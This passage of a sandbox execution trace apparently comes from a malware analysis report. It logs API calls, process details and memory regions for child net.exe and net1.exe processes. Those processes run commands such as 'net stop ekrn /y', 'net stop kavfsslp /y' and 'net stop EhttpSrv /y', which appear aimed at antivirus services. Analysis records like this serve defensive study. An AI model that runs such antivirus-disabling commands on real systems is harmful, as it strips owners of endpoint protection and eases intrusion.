(_String1="netpopup", _String2="ekrn") returned 9 [0123.760] _wcsicmp (_String1="redirector", _String2="ekrn") returned 13 [0123.760] _wcsicmp (_String1="redir", _String2="ekrn") returned 13 [0123.760] _wcsicmp (_String1="rdr", _String2="ekrn") returned 13 [0123.760] _wcsicmp (_String1="workstation", _String2="ekrn") returned 18 [0123.760] _wcsicmp (_String1="work", _String2="ekrn") returned 18 [0123.760] _wcsicmp (_String1="wksta", _String2="ekrn") returned 18 [0123.760] _wcsicmp (_String1="prdr", _String2="ekrn") returned 11 [0123.760] _wcsicmp (_String1="devrdr", _String2="ekrn") returned -1 [0123.760] _wcsicmp (_String1="lanmanworkstation", _String2="ekrn") returned 7 [0123.760] _wcsicmp (_String1="server", _String2="ekrn") returned 14 [0123.760] _wcsicmp (_String1="svr", _String2="ekrn") returned 14 [0123.760] _wcsicmp (_String1="srv", _String2="ekrn") returned 14 [0123.760] _wcsicmp (_String1="lanmanserver", _String2="ekrn") returned 7 [0123.760] _wcsicmp (_String1="alerter", _String2="ekrn") returned -4 [0123.760] _wcsicmp (_String1="netlogon", _String2="ekrn") returned 9 [0123.760] _wcsupr (in: _String="ekrn" | out: _String="EKRN") returned="EKRN" [0123.760] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x18c900 [0123.764] GetServiceKeyNameW (in: hSCManager=0x18c900, lpDisplayName="EKRN", lpServiceName=0xff285750, lpcchBuffer=0xafda8 | out: lpServiceName="", lpcchBuffer=0xafda8) returned 0 [0123.765] _wcsicmp (_String1="msg", _String2="EKRN") returned 8 [0123.765] _wcsicmp (_String1="messenger", _String2="EKRN") returned 8 [0123.765] _wcsicmp (_String1="receiver", _String2="EKRN") returned 13 [0123.765] _wcsicmp (_String1="rcv", _String2="EKRN") returned 13 [0123.765] _wcsicmp (_String1="redirector", _String2="EKRN") returned 13 [0123.765] _wcsicmp (_String1="redir", _String2="EKRN") returned 13 [0123.765] _wcsicmp (_String1="rdr", _String2="EKRN") returned 13 [0123.765] _wcsicmp (_String1="workstation", _String2="EKRN") returned 18 [0123.765] _wcsicmp (_String1="work", _String2="EKRN") returned 18 [0123.765] _wcsicmp (_String1="wksta", _String2="EKRN") returned 18 [0123.765] _wcsicmp (_String1="prdr", _String2="EKRN") returned 11 [0123.765] _wcsicmp (_String1="devrdr", _String2="EKRN") returned -1 [0123.765] _wcsicmp (_String1="lanmanworkstation", _String2="EKRN") returned 7 [0123.765] _wcsicmp (_String1="server", _String2="EKRN") returned 14 [0123.765] _wcsicmp (_String1="svr", _String2="EKRN") returned 14 [0123.765] _wcsicmp (_String1="srv", _String2="EKRN") returned 14 [0123.765] _wcsicmp (_String1="lanmanserver", _String2="EKRN") returned 7 [0123.765] _wcsicmp (_String1="alerter", _String2="EKRN") returned -4 [0123.765] _wcsicmp (_String1="netlogon", _String2="EKRN") returned 9 [0123.765] NetServiceControl (in: servername=0x0, service="EKRN", opcode=0x0, arg=0x0, bufptr=0xafdb0 | out: bufptr=0xafdb0) returned 0x889 [0123.766] wcscpy_s (in: _Destination=0xff2880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0123.766] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0123.767] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff285b50, nSize=0x800, Arguments=0xff287f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0123.769] GetFileType (hFile=0xb) returned 0x2 [0123.769] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xafc78 | out: lpMode=0xafc78) returned 1 [0123.769] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff285b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xafc70, lpReserved=0x0 | out: lpBuffer=0xff285b50*, lpNumberOfCharsWritten=0xafc70*=0x1e) returned 1 [0123.770] GetFileType (hFile=0xb) returned 0x2 [0123.770] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xafc78 | out: lpMode=0xafc78) returned 1 [0123.770] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff261efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xafc70, lpReserved=0x0 | out: lpBuffer=0xff261efc*, lpNumberOfCharsWritten=0xafc70*=0x2) returned 1 [0123.770] _ultow (in: _Dest=0x889, _Radix=720096 | out: _Dest=0x889) returned="2185" [0123.770] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff285b50, nSize=0x800, Arguments=0xff287f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0123.770] GetFileType (hFile=0xb) returned 0x2 [0123.771] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xafc78 | out: lpMode=0xafc78) returned 1 [0123.771] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff285b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xafc70, lpReserved=0x0 | out: lpBuffer=0xff285b50*, lpNumberOfCharsWritten=0xafc70*=0x34) returned 1 [0123.771] GetFileType (hFile=0xb) returned 0x2 [0123.771] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xafc78 | out: lpMode=0xafc78) returned 1 [0123.771] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff261efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xafc70, lpReserved=0x0 | out: lpBuffer=0xff261efc*, lpNumberOfCharsWritten=0xafc70*=0x2) returned 1 [0123.772] NetApiBufferFree (Buffer=0x184d40) returned 0x0 [0123.772] NetApiBufferFree (Buffer=0x18c0e0) returned 0x0 [0123.772] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ekrn /y" [0123.772] exit (_Code=2) Process: id = "404" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x7a6e5000" os_pid = "0xf10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop kavfsslp /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13961 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13962 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 13963 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 13964 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 13965 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13966 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13967 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13968 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 13969 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13970 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13971 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 13972 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13973 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13974 start_va = 0x100000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 13975 start_va = 0x200000 end_va = 0x266fff entry_point = 0x200000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13976 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13977 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13978 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13979 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14179 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14180 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 14181 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 14182 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 14183 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 14184 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 14185 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 14186 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 14187 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 14188 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 14189 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 14190 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14191 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14192 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 14193 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14194 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 964 os_tid = 0x90 Process: id = "405" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x25e2f000" os_pid = "0xde8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "385" os_parent_pid = "0xdb4" cmd_line = "C:\\Windows\\system32\\net1 stop EhttpSrv /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13988 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13989 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13990 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13991 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 13992 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13993 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13994 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13995 start_va = 0xff260000 end_va = 0xff292fff entry_point = 0xff260000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 13996 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13997 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13998 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 13999 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 14000 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14001 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14002 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 14003 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14004 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 14005 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 14006 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14085 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14086 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 14087 start_va = 0x460000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 14088 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 14089 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 14090 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 14091 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 14092 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 14093 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 14094 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 14095 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 14096 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 14097 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 14098 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14099 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14100 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 14101 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 14102 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14103 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14104 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 966 os_tid = 0xe6c [0123.966] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af890 | out: lpSystemTimeAsFileTime=0x1af890*(dwLowDateTime=0xff030ad0, dwHighDateTime=0x1d48689)) [0123.966] GetCurrentProcessId () returned 0xde8 [0123.966] GetCurrentThreadId () returned 0xe6c [0123.966] GetTickCount () returned 0x289d7 [0123.966] QueryPerformanceCounter (in: lpPerformanceCount=0x1af898 | out: lpPerformanceCount=0x1af898*=1817088400000) returned 1 [0123.966] GetModuleHandleW (lpModuleName=0x0) returned 0xff260000 [0123.966] __set_app_type (_Type=0x1) [0123.967] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff279c9c) returned 0x0 [0123.967] __getmainargs (in: _Argc=0xff284780, _Argv=0xff284790, _Env=0xff284788, _DoWildCard=0, _StartInfo=0xff28479c | out: _Argc=0xff284780, _Argv=0xff284790, _Env=0xff284788) returned 0 [0123.967] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0123.967] GetConsoleOutputCP () returned 0x1b5 [0123.967] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff28cec0 | out: lpCPInfo=0xff28cec0) returned 1 [0123.967] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0123.969] sprintf_s (in: _DstBuf=0x1af838, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0123.969] setlocale (category=0, locale=".437") returned="English_United States.437" [0123.970] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0123.970] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0123.970] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EhttpSrv /y" [0123.970] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1af5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0123.971] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0123.971] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1af828 | out: Buffer=0x1af828*=0x374d40) returned 0x0 [0123.971] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1af828 | out: Buffer=0x1af828*=0x37c0e0) returned 0x0 [0123.971] _fileno (_File=0x7fefdba2a80) returned 0 [0123.971] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0123.971] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0123.971] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0123.971] _wcsicmp (_String1="config", _String2="stop") returned -16 [0123.971] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0123.971] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0123.971] _wcsicmp (_String1="file", _String2="stop") returned -13 [0123.971] _wcsicmp (_String1="files", _String2="stop") returned -13 [0123.971] _wcsicmp (_String1="group", _String2="stop") returned -12 [0123.971] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0123.971] _wcsicmp (_String1="help", _String2="stop") returned -11 [0123.971] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0123.971] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0123.971] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0123.971] _wcsicmp (_String1="session", _String2="stop") returned -15 [0123.971] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0123.971] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0123.971] _wcsicmp (_String1="share", _String2="stop") returned -12 [0123.971] _wcsicmp (_String1="start", _String2="stop") returned -14 [0123.971] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0123.971] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0123.972] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0123.972] _wcsicmp (_String1="accounts", _String2="EhttpSrv") returned -4 [0123.972] _wcsicmp (_String1="computer", _String2="EhttpSrv") returned -2 [0123.972] _wcsicmp (_String1="config", _String2="EhttpSrv") returned -2 [0123.972] _wcsicmp (_String1="continue", _String2="EhttpSrv") returned -2 [0123.972] _wcsicmp (_String1="cont", _String2="EhttpSrv") returned -2 [0123.972] _wcsicmp (_String1="file", _String2="EhttpSrv") returned 1 [0123.972] _wcsicmp (_String1="files", _String2="EhttpSrv") returned 1 [0123.972] _wcsicmp (_String1="group", _String2="EhttpSrv") returned 2 [0123.972] _wcsicmp (_String1="groups", _String2="EhttpSrv") returned 2 [0123.972] _wcsicmp (_String1="help", _String2="EhttpSrv") returned 3 [0123.972] _wcsicmp (_String1="helpmsg", _String2="EhttpSrv") returned 3 [0123.972] _wcsicmp (_String1="localgroup", _String2="EhttpSrv") returned 7 [0123.972] _wcsicmp (_String1="pause", _String2="EhttpSrv") returned 11 [0123.972] _wcsicmp (_String1="session", _String2="EhttpSrv") returned 14 [0123.972] _wcsicmp (_String1="sessions", _String2="EhttpSrv") returned 14 [0123.972] _wcsicmp (_String1="sess", _String2="EhttpSrv") returned 14 [0123.972] _wcsicmp (_String1="share", _String2="EhttpSrv") returned 14 [0123.972] _wcsicmp (_String1="start", _String2="EhttpSrv") returned 14 [0123.972] _wcsicmp (_String1="stats", _String2="EhttpSrv") returned 14 [0123.972] _wcsicmp (_String1="statistics", _String2="EhttpSrv") returned 14 [0123.972] _wcsicmp (_String1="stop", _String2="EhttpSrv") returned 14 [0123.972] _wcsicmp (_String1="time", _String2="EhttpSrv") returned 15 [0123.972] _wcsicmp (_String1="user", _String2="EhttpSrv") returned 16 [0123.972] _wcsicmp (_String1="users", _String2="EhttpSrv") returned 16 [0123.972] _wcsicmp (_String1="msg", _String2="EhttpSrv") returned 8 [0123.972] _wcsicmp (_String1="messenger", _String2="EhttpSrv") returned 8 [0123.972] _wcsicmp (_String1="receiver", _String2="EhttpSrv") returned 13 [0123.972] _wcsicmp (_String1="rcv", _String2="EhttpSrv") returned 13 [0123.972] _wcsicmp (_String1="netpopup", _String2="EhttpSrv") returned 9 [0123.972] _wcsicmp (_String1="redirector", _String2="EhttpSrv") returned 13 [0123.972] _wcsicmp (_String1="redir", _String2="EhttpSrv") returned 13 [0123.972] _wcsicmp (_String1="rdr", _String2="EhttpSrv") returned 13 [0123.972] _wcsicmp (_String1="workstation", _String2="EhttpSrv") returned 18 [0123.972] _wcsicmp (_String1="work", _String2="EhttpSrv") returned 18 [0123.972] _wcsicmp (_String1="wksta", _String2="EhttpSrv") returned 18 [0123.972] _wcsicmp (_String1="prdr", _String2="EhttpSrv") returned 11 [0123.972] _wcsicmp (_String1="devrdr", _String2="EhttpSrv") returned -1 [0123.972] _wcsicmp (_String1="lanmanworkstation", _String2="EhttpSrv") returned 7 [0123.972] _wcsicmp (_String1="server", _String2="EhttpSrv") returned 14 [0123.972] _wcsicmp (_String1="svr", _String2="EhttpSrv") returned 14 [0123.972] _wcsicmp (_String1="srv", _String2="EhttpSrv") returned 14 [0123.973] _wcsicmp (_String1="lanmanserver", _String2="EhttpSrv") returned 7 [0123.973] _wcsicmp (_String1="alerter", _String2="EhttpSrv") returned -4 [0123.973] _wcsicmp (_String1="netlogon", _String2="EhttpSrv") returned 9 [0123.973] _wcsupr (in: _String="EhttpSrv" | out: _String="EHTTPSRV") returned="EHTTPSRV" [0123.973] OpenSCManagerW 